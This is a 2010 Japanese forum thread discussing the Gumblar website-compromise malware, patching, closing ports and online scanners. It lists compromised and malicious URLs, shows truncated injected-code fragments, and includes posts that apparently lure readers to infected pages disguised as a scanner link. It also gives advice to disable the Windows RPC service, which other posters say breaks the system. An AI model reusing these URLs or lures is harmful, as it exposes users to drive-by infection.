今はスクリプト一切使ってないサイトの方が少ないくらいだからな
0311Undetect
2010/05/03(月) 23:10:44そういう手立てを考えてきてるしね
0312名無しさん@お腹いっぱい。
2010/05/03(月) 23:11:500313名無しさん@お腹いっぱい。
2010/05/03(月) 23:15:29スクリプト切るのは気休め程度にはなる
0314名無しさん@お腹いっぱい。
2010/05/04(火) 00:27:03found:Trojan-Downloader.JS.Pegel.e
try{window.onload=function()…
0315名無しさん@お腹いっぱい。
2010/05/04(火) 02:12:340316名無しさん@お腹いっぱい。
2010/05/04(火) 11:41:06request policy
0317名無しさん@お腹いっぱい。
2010/05/04(火) 11:53:400318名無しさん@お腹いっぱい。
2010/05/04(火) 11:56:440319名無しさん@お腹いっぱい。
2010/05/04(火) 12:02:440320名無しさん@お腹いっぱい。
2010/05/04(火) 12:11:01結局は当時スレ立てした奴がどうしても入れたがって今の形に落ち着いちゃった。
0321名無しさん@お腹いっぱい。
2010/05/04(火) 13:00:50不要なら>>4入れる必要すらないじゃん
まぁスレ建てた奴が必要だ必要だとゴネたんだろうか
0322名無しさん@お腹いっぱい。
2010/05/04(火) 13:24:430323名無しさん@お腹いっぱい。
2010/05/04(火) 13:31:410324名無しさん@お腹いっぱい。
2010/05/04(火) 13:31:460325名無しさん@お腹いっぱい。
2010/05/04(火) 13:35:500326名無しさん@お腹いっぱい。
2010/05/04(火) 13:51:180327名無しさん@お腹いっぱい。
2010/05/04(火) 13:59:110328名無しさん@お腹いっぱい。
2010/05/04(火) 14:10:32ゴネたね。
放っとけばNoScriptみたいな特定拡張をテンプレに入れるのが確実なところを
他の奴が説得して、当たり障りのない>>4まで後退させた感じ。
0329名無しさん@お腹いっぱい。
2010/05/04(火) 14:16:410330名無しさん@お腹いっぱい。
2010/05/04(火) 14:28:24前スレの残り50レスぐらいでテンプレの見直し案を話し合えばよかったのにさ。
0331名無しさん@お腹いっぱい。
2010/05/04(火) 15:53:130332名無しさん@お腹いっぱい。
2010/05/04(火) 16:08:340333名無しさん@お腹いっぱい。
2010/05/04(火) 16:11:04今のところ大丈夫ってだけで無力とはだれもいってないんじゃね
0334名無しさん@お腹いっぱい。
2010/05/04(火) 16:27:29現状でのJavaScript切りは掛け捨てが確実な保険みたいな物なんだからさ。
0335名無しさん@お腹いっぱい。
2010/05/04(火) 17:15:21今出てるものに対して無力ならそれで十分だろ
これから出る亜種にも完璧です、が成立するんならgumblerに限らず
どのウイルスも感染する騒ぎになんてならないと思うんだが
0336コテハン
2010/05/04(火) 18:40:41【陥落サイトのURL悪用厳禁】
www●seibidou●jp/ ←中途半端な修正
※products/information_sign/index●htmlとか
www●terralab●net/
bishoujyo●net/
rnacity●com/
■Gumblarっぽいの
www16●tok2●com/home/sawaiwan/part11/information4●html
0337コテハン1
2010/05/04(火) 19:11:56www.hipparidako.net/index.html
0338名無しさん@お腹いっぱい。
2010/05/04(火) 19:34:590339八頭 ◆YAGApwSaEw
2010/05/04(火) 19:53:29Google危険警告ページ
www●444wg●com/
wofxx●com/dnf/105.html
wofxx●com/dnf/106.html
www●dvdktv.com/list.asp?ProdId=0014
0340名無しさん@お腹いっぱい。
2010/05/05(水) 01:50:23そもそもGENOも尼や楽天に比べればユーザー数は大した事ないだろうし
URL見てもどうでもいいような個人HPばっかのようだし
0341名無しさん@お腹いっぱい。
2010/05/05(水) 02:08:17ニュースは見てないのか?
0342名無しさん@お腹いっぱい。
2010/05/05(水) 02:08:44目指せ「サルでも判るガンブラー対策」…今更すぎるorz
>>336
www16●tok2●com/home/sawaiwan/part11/information4●html :Gumblar Generic (GJS005)
ここもですね
www●mayabeya●com/mm/mail_magazine●html :Gumblar Generic (GJS003)
>>337
www●hipparidako●net/index●html :8080 Injection (GJS092)
>>339
この類のサイトは放置でも構わない気がしないでもないw
0343名無しさん@お腹いっぱい。
2010/05/05(水) 02:11:10おまえはなにをいってるんだ
0344名無しさん@お腹いっぱい。
2010/05/05(水) 05:13:47なんかGENO以外に大事件あったっけ
あーJR束は改ざんされたか
0345名無しさん@お腹いっぱい。
2010/05/05(水) 06:13:22セキュリティ関連ニュースを過去ログ含めて読んでみるといい
0346名無しさん@お腹いっぱい。
2010/05/05(水) 12:29:570347名無しさん@お腹いっぱい。
2010/05/05(水) 13:21:590348名無しさん@お腹いっぱい。
2010/05/05(水) 13:40:010349名無しさん@お腹いっぱい。
2010/05/05(水) 13:45:200350名無しさん@お腹いっぱい。
2010/05/05(水) 13:51:010351名無しさん@お腹いっぱい。
2010/05/05(水) 14:33:26踏んじまったけどavast反応しねー
0352名無しさん@お腹いっぱい。
2010/05/05(水) 14:41:31三井住友VISAも改ざんされなかったっけ?
一応プレスリリースで報告出したけど、対応が最低だった
0353名無しさん@お腹いっぱい。
2010/05/05(水) 15:14:13見てみたけど確かに最低だな
委託会社の責任とはいえ個人情報やクレカ番号流出させといて
保証のほの字も書いてないんじゃなあ…
0354名無しさん@お腹いっぱい。
2010/05/05(水) 15:54:220355名無しさん@お腹いっぱい。
2010/05/05(水) 16:00:13>>278だな
gredスルー
aguseスルーだが8080を拾って赤文字表示
そのドメインでぐぐったら必死チェッカーがひっかかった
同一人物が連日貼っているようだね
hissi.org/read.php/news/20100504/SjJBaCtkNVc.html
hissi.org/read.php/news/20100503/RVVtUUl6SWM.html
0356名無しさん@お腹いっぱい。
2010/05/05(水) 17:00:16何でTVや新聞で大きく取り上げられないの?
0357名無しさん@お腹いっぱい。
2010/05/05(水) 17:09:49三井住友だと自分に出資してるところだったりして
自分の首を絞めることになるから
0358名無しさん@お腹いっぱい。
2010/05/05(水) 17:13:01サンクス
0359名無しさん@お腹いっぱい。
2010/05/05(水) 17:13:370360名無しさん@お腹いっぱい。
2010/05/05(水) 18:48:20多少ニュースにはなったけど説明めんどくさくて省略されがち
NHKニュースでわりとまともに扱ってくれたことはあったけど視聴者は思考停止が大半だろうな
0361名無しさん@お腹いっぱい。
2010/05/05(水) 18:49:58→サイト管理のIDとPasswordを盗まれる→
→それを使用されサーバ自体から情報が盗まれる、ついでにサイト改竄(ウイルスを仕込む)→
→そのサイトの訪問者にGumblar感染、感染先でまたIDとPasswordが盗まれる→あとは繰り返し
でも不思議なのはサービス提供する企業とかのサーバなのに、なんでそれ使ってネットサーフィンなんかやってんの?
それともアクセスされるだけで感染するわけか
それとゼロデイ攻撃の段階では仕方ないとしても、それ以降はアプデしておくだけで防げたんでそ
なんで企業レベル行政レベルがこんなものに感染し続けたのか
0362名無しさん@お腹いっぱい。
2010/05/05(水) 19:17:05企業はパッチの安全性や安定性が確認されるまでパッチを導入しないことがほとんど
理由はパッチの適用でシステムが不安定になる可能性がゼロじゃないから
ゼロデイ修正パッチとかは配布元的には配布と同時に適用してもらいたいはずだが
確認が終わるまで導入が見送られるため攻撃に晒されてしまうことがある
0363名無しさん@お腹いっぱい。
2010/05/05(水) 19:34:45いろいろ勘違いしてるようだけど
サーバ自身でネットサーフィンとかしてるわけじゃないし
感染してるのはサイト管理PCであってサーバじゃない
おそらく話の半分くらいしか理解できてないよね
> それともアクセスされるだけで感染するわけか
アクセスされるだけで感染するのはそのサイトを閲覧したPCであってサーバーじゃない
感染し続けてる理由はサイト管理者のセキュリティ意識が低いからってだけだよ
閲覧してるPCが感染し続けるのは>>362もあるけど
それは企業のサイト改ざんにはあまり結びつかない
0364名無しさん@お腹いっぱい。
2010/05/05(水) 19:35:27サイト管理PCもしくはサイト管理PCと同じネットワーク内にあるPCだ
0365名無しさん@お腹いっぱい。
2010/05/05(水) 20:27:34聞き覚えある、そういう要素あったね
>>363
なるほどそっかー
サーバでネットサーフィンとか、言われると自分で読んでても確かに痛い誤解
>閲覧してるPCが感染し続けるのは>>362もあるけど
>それは企業のサイト改ざんにはあまり結びつかない
これは>>362は組織・団体レベルのサイト管理者はこれが言い訳にはならないってこと?
ここも合わせて読んで9割は理解できたと思う
http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/022.html
でもFTPのIDとPasswordを盗られる以外の被害ってあんま語られないね
そのうち暴露系と組み合わさったものが出てくるのかもしれんね
またとんちんかんだったらゴメン笑
0366名無しさん@お腹いっぱい。
2010/05/05(水) 20:48:18一般ユーザーが多い企業、部署や実際に運用してる基幹系サーバーじゃパッチあてに
慎重なとこもあるけどサイト管理してるとこでそれはありえないでしょ
単に意識が希薄だったとしかいえない
しかも大きめの企業サイトなら管理してるのはシロウトじゃなくプロ
「同一ネットワーク内」の感染があるとしてもプロがやるミスとしてはありえないレベル
> でもFTPのIDとPasswordを盗られる以外の被害ってあんま語られないね
これはいろいろ出てるんだけど適当にまとまったソースはないかもしれない
so-netのセキュリティ通信とかLACあたりにあったかなー
ユーザーにも見える範囲だと偽セキュリティソフトのインストール、
見えないとこだとどっかのサイト攻撃とか
偽セキュリティソフトのインストールはケイダッシュが感染したときの被害者報告でも確認できた
暴露系はP2Pで目的が違うから別です
0367名無しさん@お腹いっぱい。
2010/05/05(水) 21:08:21暴露系ってP2Pを超えて被害を出したんじゃなかったっけ、山田オルタナティブ、Kenzeroとか
まあスクショ取ってバラ撒くくらいのものがGunblarでもありうるかと思った
いろいろ勉強してくる、ありがとう!
0368名無しさん@お腹いっぱい。
2010/05/05(水) 21:16:13肝心なこと忘れてた
そもそもまともなサイト管理会社ならFTPなんか使わない
>>367
日本のウイルスはイタズラ目的
こういうのはビジネス目的だから違うんだよ
0369名無しさん@お腹いっぱい。
2010/05/05(水) 22:35:53元々非公開設定だから改竄されても他人には迷惑かけないとは思うんだけど……
0370名無しさん@お腹いっぱい。
2010/05/05(水) 22:46:44VIPとかの画像スレとかで見たなそれ
レスに対して不自然な単発レスとか付いてたし
「面白いなこのサイト」とかあったから自演を駆使して踏ませようと必死になってるっぽいw
0371名無しさん@お腹いっぱい。
2010/05/05(水) 23:14:15FTPサーバ上で提供されるサイトやブログがGumblarに感染して、そうして管理IDとPassを盗られて、それを使って改竄をするんじゃない
だからそのブログを改竄しようと思えばやれるんだけど、そのブログにそんなことする価値があるのかで変わってくるんじゃないのかね
0372名無しさん@お腹いっぱい。
2010/05/05(水) 23:27:38改竄する価値は無いと思うw
自分のPCが感染してたら
クリーンインストールしてブログのパスワードも変えなきゃいけないのかあと思って
0373名無しさん@お腹いっぱい。
2010/05/05(水) 23:36:370374名無しさん@お腹いっぱい。
2010/05/05(水) 23:37:400375名無しさん@お腹いっぱい。
2010/05/05(水) 23:40:150376371
2010/05/05(水) 23:48:12これ違ったか、個々のクライアントPCが感染するんだ、そしてFTPサーバ上で提供されるサイト開設やブログ開設サービスを使ってる場合にその管理者IDとPassを盗られる
だから、公開してないんだから大丈夫だと思ったけど上記の理由で大丈夫じゃない
それに管理者IDとPass盗られて改竄できるってことは、ただ閲覧されたりもするってことで
犯人たちの目的と興味次第ってことだと
0377名無しさん@お腹いっぱい。
2010/05/05(水) 23:52:10日本語わからんからそういうの関係ないよ
軒並み改ざんされるだけ
ブログの場合はFTPじゃないとおもうんでまた別だろうけど
感染していた場合はそのPCで犯罪行為の手伝いをさせられるんでクリーンインストール推奨です
0378名無しさん@お腹いっぱい。
2010/05/05(水) 23:55:15blogまではいちいち改ざんしないとは思うけど
まぁ、過信は禁物だね
0379369
2010/05/06(木) 00:03:12これが一番確かなんですよね
アドバイスくれた方々どうもです
>>2は以前からやってたけど
そもそも自分のブログは改竄される可能性があるのかどうかが気になって
ちょっと気持ち悪かったので質問させてもらいました
0380名無しさん@お腹いっぱい。
2010/05/06(木) 00:13:49意識の低さが浮き彫りになってるな
0381名無しさん@お腹いっぱい。
2010/05/06(木) 00:19:090382名無しさん@お腹いっぱい。
2010/05/06(木) 01:06:16タグを記述する場合もテキストボックス上で行うから
PCが感染してても問題ないように思うけど
0383名無しさん@お腹いっぱい。
2010/05/06(木) 01:27:55>>2をやっておけば「現時点では」感染しない。
※Adobe ReaderやJavaは必要無いならアンインストールを推奨
【参照】
サイト改ざん猛威:ウイルス感染を100%防げる「ソフトウェアの更新」を
ttp://www.so-net.ne.jp/security/news/library/2165.html
オラクル、JREの最新版「6 Update 20」公開〜早急に更新しないと危険
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2215
■以下は「自己満足」の世界(過剰防衛が好きな人向け)
・ブラウザのJavaScriptを切る(JavaScriptベースのDbd全般に有効)
・*:8080/*を含むURLをブロック(対8080系限定)
・8080番ポートを閉じる(対8080系限定/但し非推奨)
0384名無しさん@お腹いっぱい。
2010/05/06(木) 01:40:05【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
0385名無しさん@お腹いっぱい。
2010/05/06(木) 02:51:57ポート135を閉じる(RPC停止する)と問題発生することが多いと書いてあったが
>そこで,Windows XPが備えているパーソナル・ファイアウォールやセキュリティ対策ソフトに付いているクライアントPC用のファイアウォール機能で
>危険なポートを閉じれば,感染予防としてはさらに効果があります。しかし,既存システムへ与える影響は大きくなります。
>例えば,各PCでTCP/UDP135番を閉じてしまうと,RPCを用いたシステムやActive Directoryが拠点内でも利用できなくなります。
>また,TCP/UDP139番や445番を閉じると,ファイルやプリンタの共有さえできなくなります。
まあ、やるなら自己責任でってことで
0386385
2010/05/06(木) 02:53:330387名無しさん@お腹いっぱい。
2010/05/06(木) 02:59:50139や445はLANを組んでなかったら閉じても問題ない
0388名無しさん@お腹いっぱい。
2010/05/06(木) 03:04:41外部からのアクセスのみだけど
0389名無しさん@お腹いっぱい。
2010/05/06(木) 03:08:040390名無しさん@お腹いっぱい。
2010/05/06(木) 03:10:320391名無しさん@お腹いっぱい。
2010/05/06(木) 03:19:34OSの再インストールをするはめになる
回避策はあるがド素人はやめとけ
0392名無しさん@お腹いっぱい。
2010/05/06(木) 09:18:510393名無しさん@お腹いっぱい。
2010/05/06(木) 10:13:00シマンテックのスキャン使ったことないからわからないけど
今確認したら俺はポート135,445は受信ストリームはTCP/UDPとも俺は手持ちのカスペがデフォで閉じていた
8080は一応自分でTCP/UDPともリモートポートは閉じてみた
0394名無しさん@お腹いっぱい。
2010/05/06(木) 12:47:460395394
2010/05/06(木) 12:48:360396名無しさん@お腹いっぱい。
2010/05/06(木) 12:54:030397名無しさん@お腹いっぱい。
2010/05/06(木) 13:07:560398名無しさん@お腹いっぱい。
2010/05/06(木) 13:13:350399名無しさん@お腹いっぱい。
2010/05/06(木) 13:16:330400名無しさん@お腹いっぱい。
2010/05/06(木) 13:34:500401名無しさん@お腹いっぱい。
2010/05/06(木) 13:39:470402名無しさん@お腹いっぱい。
2010/05/06(木) 13:44:370403名無しさん@お腹いっぱい。
2010/05/06(木) 13:59:12サービスを止めるのと、ポートを閉じるのは違うぞ。
サービス止めればOSに問題が起きるだろ。
0404385
2010/05/06(木) 16:10:17>Gumblar.xの改ざんコードは日本のIPアドレスからのアクセスを弾く!?
ttp://www●securelist●com/en/blog/2132/Gumblar_Farewell_Japan
↑これってGumblar.Xに関しては終息するってこと?
0405名無しさん@お腹いっぱい。
2010/05/06(木) 16:45:490406名無しさん@お腹いっぱい。
2010/05/06(木) 17:00:33仮に今弾いてるとしても一時的なものと思ってた方がいい
0407名無しさん@お腹いっぱい。
2010/05/06(木) 17:23:32Gumblarの大元の作者は日本への攻撃を念頭に置いてるだろうしな
0408名無しさん@お腹いっぱい。
2010/05/06(木) 17:29:590409名無しさん@お腹いっぱい。
2010/05/06(木) 17:34:47老害の思考はこんなもんです
そして「自分だけは大丈夫」と思ってる奴がかかってサイト持ちがまたバラ撒く悪循環
0410名無しさん@お腹いっぱい。
2010/05/06(木) 17:56:06そのくせ対策はセキュソフト任せでWindowsUpdateやってればマシな部類という…
0411名無しさん@お腹いっぱい。
2010/05/06(木) 18:03:12PCにどこまでも人生の時間使ってられるかよ
0412名無しさん@お腹いっぱい。
2010/05/06(木) 18:10:45本来それが理想なんだがな
0413名無しさん@お腹いっぱい。
2010/05/06(木) 18:29:43これは間違いか?
0414名無しさん@お腹いっぱい。
2010/05/06(木) 18:31:290415名無しさん@お腹いっぱい。
2010/05/06(木) 18:31:500416名無しさん@お腹いっぱい。
2010/05/06(木) 18:32:08今は大丈夫でも対策されるのは時間の問題だろうし
少なくとも、わざわざこんな板まで来るくらいに危機意識持ってるならアンインスコ必須かと
0417名無しさん@お腹いっぱい。
2010/05/06(木) 18:34:46なんだあ、ぺぺぺって
わかりにくい反応すんなw
0418名無しさん@お腹いっぱい。
2010/05/06(木) 18:37:06( ゚,_ゝ゚)バカジャネーノ
0419名無しさん@お腹いっぱい。
2010/05/06(木) 18:38:44JavaScriptも切っておけよ、極論厨
0420名無しさん@お腹いっぱい。
2010/05/06(木) 18:40:11動画見れないとかなるとPC使う理由が半分はなくなる
エロだけのこと言ってんじゃないよ?
Flashplayer使えないとかネットしててもおもしろくないよ
0421名無しさん@お腹いっぱい。
2010/05/06(木) 18:40:15それは普通に切るだろ
0422名無しさん@お腹いっぱい。
2010/05/06(木) 18:40:46PDFリーダーとJavaはともかくFlash Playerアンインスコは非現実的でしょ
0423名無しさん@お腹いっぱい。
2010/05/06(木) 18:52:29そういうものを使えば両者対立せずに済む
終了
0424名無しさん@お腹いっぱい。
2010/05/06(木) 19:44:09で、OFFにしておいたまま放置してバージョンが古くなったFlashPlayerの
脆弱性をつつかれて感染ですね
わかります
0425名無しさん@お腹いっぱい。
2010/05/06(木) 19:53:56ON/OFF切り替えなんて発想無いぞ?
0426名無しさん@お腹いっぱい。
2010/05/06(木) 19:56:460427名無しさん@お腹いっぱい。
2010/05/06(木) 21:56:370428名無しさん@お腹いっぱい。
2010/05/06(木) 22:16:500429名無しさん@お腹いっぱい。
2010/05/06(木) 22:43:210430名無しさん@お腹いっぱい。
2010/05/06(木) 22:52:360431名無しさん@お腹いっぱい。
2010/05/06(木) 22:55:110432名無しさん@お腹いっぱい。
2010/05/06(木) 23:00:09レベル高かったことって
あったっけ
0433名無しさん@お腹いっぱい。
2010/05/06(木) 23:01:26それ以外は糞
0434名無しさん@お腹いっぱい。
2010/05/06(木) 23:44:22動画は落としてから見ればいいんじゃないか?
0435名無しさん@お腹いっぱい。
2010/05/06(木) 23:44:260436名無しさん@お腹いっぱい。
2010/05/06(木) 23:59:40ttp://www39.atwiki.jp/dl-ihou/pages/14.html
0437名無しさん@お腹いっぱい。
2010/05/07(金) 00:31:55なんならOS毎仮想化しとけ
0438名無しさん@お腹いっぱい。
2010/05/07(金) 01:25:58奴等にできるわけねーだろ
0439名無しさん@お腹いっぱい。
2010/05/07(金) 02:50:450440名無しさん@お腹いっぱい。
2010/05/07(金) 13:13:310441名無しさん@お腹いっぱい。
2010/05/07(金) 13:29:450442コテハン ◆8080adndqg
2010/05/07(金) 14:16:53newegg-com●paypal●com●renren-com●wayoutmall●ru:8080/・・・以下略
<?eval(base64_decode("Cm1i・・・
あふぃ・・・なのか?
0443名無しさん@お腹いっぱい。
2010/05/07(金) 14:39:16憶測は書くな。
0444名無しさん@お腹いっぱい。
2010/05/07(金) 17:24:200445コテハン ◆8080adndqg
2010/05/07(金) 18:00:22--
【陥落サイトのURL悪用厳禁】
blog●ceed●jp/ ←サイト内全滅w(.jsも)
myako●net/ ←中途半端な修正
※java2/imgkotei●js
www●hds-x●com/ ←Refresh
↓
www●hds-x●com/top●html ←Gumblarがw
doujinnews●jp
0446名無しさん@お腹いっぱい。
2010/05/07(金) 18:20:53一番下のドメインがこわい
0447名無しさん@お腹いっぱい。
2010/05/07(金) 18:21:23そのサイトのトップにはgumblerがあったとしても
そのサイトのトップ以外のページ(コラムとか他サイトへのリンクページとか)にはgumblerが無く
そこを見る分には大丈夫という場合はあるのか
まあ、>>2の対策をしていてもわざわざそんなページを見に行く物好きもそういないとおもうけど
0448名無しさん@お腹いっぱい。
2010/05/07(金) 18:22:10そろそろまた新しいゼロデイが発生する頃だよな…
来月か再来月くらいのWindowsUpdateの前後に更新されると予想
0449名無しさん@お腹いっぱい。
2010/05/07(金) 18:23:10あるけどいつ埋め込まれるかわからんしおすすめはしない
0450名無しさん@お腹いっぱい。
2010/05/07(金) 18:36:05初めて見たけどいままで気付かなかっただけかな
0451名無しさん@お腹いっぱい。
2010/05/07(金) 18:57:55flashplayerの代替品をMS辺りが用意してくれよ
0452名無しさん@お腹いっぱい。
2010/05/07(金) 19:20:07F-Secureブログで、F-Secureで開発するかもって言ってた
0453名無しさん@お腹いっぱい。
2010/05/07(金) 19:20:48つsilver light
0454名無しさん@お腹いっぱい。
2010/05/07(金) 20:25:13どう間違ったらそこでMSなんだよ
0455名無しさん@お腹いっぱい。
2010/05/07(金) 20:57:52silver lightは代替手段としてはありだと思うが
今の半分くらいまで負荷を下げてくれないと低スペPCがつらい
あとグラボの再生支援への対応
0456名無しさん@お腹いっぱい。
2010/05/07(金) 21:02:25○Silverlight
0457名無しさん@お腹いっぱい。
2010/05/07(金) 21:28:430458名無しさん@お腹いっぱい。
2010/05/07(金) 21:38:230459名無しさん@お腹いっぱい。
2010/05/07(金) 22:08:320460名無しさん@お腹いっぱい。
2010/05/07(金) 22:23:100461コテハン ◆8080adndqg
2010/05/07(金) 23:37:20www●google●co●jp/search?q=site%3Adoujinnews●jp&btnG=%E6%A4%9C%E7%B4%A2&hl=ja&lr=&sa=2
\(^o^)/オワタ
0462名無しさん@お腹いっぱい。
2010/05/08(土) 00:23:21http://headlines.yahoo.co.jp/hl?a=20100507-00000021-inet-secu
Yahooトップ
0463名無しさん@お腹いっぱい。
2010/05/08(土) 00:33:51なんか気のせいか物凄まじくやばいような。
0464名無しさん@お腹いっぱい。
2010/05/08(土) 00:34:240465名無しさん@お腹いっぱい。
2010/05/08(土) 00:34:37すぐにブルースクリーンになったりで調子が悪い
0466名無しさん@お腹いっぱい。
2010/05/08(土) 00:41:40Kaspersky File Scanner オンラインウイルススキャン
http://blog.ceed.jp/?jp=kaspersky/filescanner/virusscanner
これで検出されなければ感染してないよ
0467名無しさん@お腹いっぱい。
2010/05/08(土) 00:48:06Online Scanner
http://www.f-secure.com/en_MY/security/security-lab/tools-and-services/online-scanner/
0468名無しさん@お腹いっぱい。
2010/05/08(土) 00:57:17乙。
0469名無しさん@お腹いっぱい。
2010/05/08(土) 01:01:200470名無しさん@お腹いっぱい。
2010/05/08(土) 01:06:01は?
0471名無しさん@お腹いっぱい。
2010/05/08(土) 01:08:24あれ 競合しないのか
0472名無しさん@お腹いっぱい。
2010/05/08(土) 01:08:310473名無しさん@お腹いっぱい。
2010/05/08(土) 01:08:37>Online Scanner
0474名無しさん@お腹いっぱい。
2010/05/08(土) 01:10:18そんな認識だからPCウイルスに感染するんだぞ(笑)
0475名無しさん@お腹いっぱい。
2010/05/08(土) 01:12:23このスレのアドレス?
このスレ開いたら感染するのか?
0476名無しさん@お腹いっぱい。
2010/05/08(土) 01:17:55ホントにな…
0477名無しさん@お腹いっぱい。
2010/05/08(土) 01:25:00トロイの木馬だけどGumblarでは無いな
0478名無しさん@お腹いっぱい。
2010/05/08(土) 01:25:45うん
0479名無しさん@お腹いっぱい。
2010/05/08(土) 01:31:02そんなこと全然ないけど?
live2chで見てるけど全然平気なんだけど
>>2の対策をしてるからかな?
0480名無しさん@お腹いっぱい。
2010/05/08(土) 01:33:50うん
>このスレ開いたら感染するのか?
うん
どっちやねん
0481名無しさん@お腹いっぱい。
2010/05/08(土) 01:36:51信じるなよw
0482名無しさん@お腹いっぱい。
2010/05/08(土) 01:53:25http://www.forest.impress.co.jp/docs/news/20100506_365660.html
これどうなんだろ?
0483名無しさん@お腹いっぱい。
2010/05/08(土) 02:07:23うっかり踏んじゃったってことじゃないか。
0484名無しさん@お腹いっぱい。
2010/05/08(土) 02:27:36競合もしないレベルで動くオンラインスキャン使ってスキャンして、
それで何もないからってどれ位の意味なの
0485名無しさん@お腹いっぱい。
2010/05/08(土) 02:29:52すくなくともインストールして使うもの利用したほうがいいのかね
0486名無しさん@お腹いっぱい。
2010/05/08(土) 03:12:02ttps://www.virustotal.com/jp/analisis/284bec4e580ab7b71f5385fd7c09aa3c9dfb65eb87fd4c49baba4e2b22eccabc-1273255752
結果: 1/41 (2.44%)
McAfee-GW-Edition:Heuristic.BehavesLike.HTML.Shellcode.K
0487名無しさん@お腹いっぱい。
2010/05/08(土) 08:17:07Kasperskyのオンラインスキャンがあるのかわかりません。
どなたか教えてください。よろしくお願いします。
0488名無しさん@お腹いっぱい。
2010/05/08(土) 08:36:53そこGumblarの可能性ありって出るよ
0489名無しさん@お腹いっぱい。
2010/05/08(土) 09:09:12株式会社セカンドプランニング この会社が関わっている
yamatwo●jp
www●sobank●jp
www●spoffice●jp
全てが改ざん
0490名無しさん@お腹いっぱい。
2010/05/08(土) 09:23:25そうですか・・・
教えてくださってありがとうございます。
一応>>2-3あたりの対策はしているのですが
クリーンインストールした方がいいですか?
何度もすいません。
0491名無しさん@お腹いっぱい。
2010/05/08(土) 09:35:13ウイルスを仕込むわけではなくバナーを消したり文章を変える程度です
Web改竄について詳しく書いてあるサイトを教えてくれる形でもいいです
お願いします
0492名無しさん@お腹いっぱい。
2010/05/08(土) 09:40:270493名無しさん@お腹いっぱい。
2010/05/08(土) 09:57:54しかもそれに対して大体レスが付くことから自演を駆使してるようだ
どうせ>>465-471あたりは同一人物だろ
でもって>>490はキモイ流れになってる事とおかしなURLから危険を察しろ
0494名無しさん@お腹いっぱい。
2010/05/08(土) 11:53:36www●kfbclub●com
0495名無しさん@お腹いっぱい。
2010/05/08(土) 12:06:55URLがそのままなのはまあ黒だろ
迂闊に踏む前にちょっと流れ見るべきだね
どうせ誘導したいクソは自分が踏んで感染した腹いせなんだろうが
ひょいとのぞきに来たような人は無理に流れに参加しようとしなくていい
0496名無しさん@お腹いっぱい。
2010/05/08(土) 12:47:39ご迷惑掛けてすいません。
クリーンインストールはいいのですが
残しておきたいデータなどがあるのでほんと落ち込んでます。
今は起動させてない外付けがあるのですが、
そちらに移すと外付けの方にもダメになりますか?
基本的なことかもしれませんがどうか教えてください。
0497名無しさん@お腹いっぱい。
2010/05/08(土) 13:38:36そんな大事なデータをバックアップとっていないのなら
今回は勉強として諦めた方がいいよ
悔しいのはわかるけどね
0498名無しさん@お腹いっぱい。
2010/05/08(土) 13:39:35ざまあああああ
0499名無しさん@お腹いっぱい。
2010/05/08(土) 14:16:12dirtysin.ru:8080○google.com○kakaku.com○110mb.com○php
ご愁傷様・・・
0500名無しさん@お腹いっぱい。
2010/05/08(土) 14:31:590501名無しさん@お腹いっぱい。
2010/05/08(土) 14:44:030502名無しさん@お腹いっぱい。
2010/05/08(土) 15:03:13ttp://jvndb.jvn.jp/apis/myjvn/#VCCHECK
0503名無しさん@お腹いっぱい。
2010/05/08(土) 15:21:110504名無しさん@お腹いっぱい。
2010/05/08(土) 16:00:29そんな大事なら他のメディアに移すことも考えてみたら
Gumblarの挙動の基本はサイトの管理者アカウントを盗むことらしいし
亜種だったら他のこともするらしいけど
このスレにそこらの書き込みあったと思うよ
一方でOSクリーンインストールする時には、HDD上にデータはすべて消してからのがいいんだろうね多分
0505名無しさん@お腹いっぱい。
2010/05/08(土) 16:01:49>>97はここのコピペだぞw
http://blog.ceed.jp/
よくできておるのう ´,дゝ`)コピペにマジレス乙だお
↑を踏んでしまいました。
このコテが言うにはガンブラウィルスらしいのですが、釣りや脅しのような気がするので鑑定よろ
0506名無しさん@お腹いっぱい。
2010/05/08(土) 16:07:140507名無しさん@お腹いっぱい。
2010/05/08(土) 16:08:20馬鹿か
すれ違いじゃ
0508名無しさん@お腹いっぱい。
2010/05/08(土) 16:09:11馬鹿
所詮ローカルルールだと気づけ馬鹿
0509名無しさん@お腹いっぱい。
2010/05/08(土) 16:10:020510名無しさん@お腹いっぱい。
2010/05/08(土) 16:10:04システム上できることは仕様だから仕方ないさ
よほどのことしないかぎりね。
0511名無しさん@お腹いっぱい。
2010/05/08(土) 16:11:06今回ばかりは505みたいな阿呆にウィルスを踏ませた(VдV)をGJと言いたいwwwwwww
0512名無しさん@お腹いっぱい。
2010/05/08(土) 16:11:46ttp://dirtysin●ru:8080/google●com/kakaku●com/110mb●com●php
0513名無しさん@お腹いっぱい。
2010/05/08(土) 16:14:02>>5や>>91のチェッカー全部スルーしてやがる
0514名無しさん@お腹いっぱい。
2010/05/08(土) 16:16:11northon2010 更新済み
adobe reader 最新ver
JREはup17だったと思われ。
この環境で上記URL踏んでしまったのだが
ノートン先生でフル検索かけてもウィルスが見つからない。
後外部から自分のPCに向けてポートスキャンかけてみたけど(LANで)、異常無し。
普段wimaxで接続してるからgkbrなんだが…さてはて
0515名無しさん@お腹いっぱい。
2010/05/08(土) 16:18:000516514
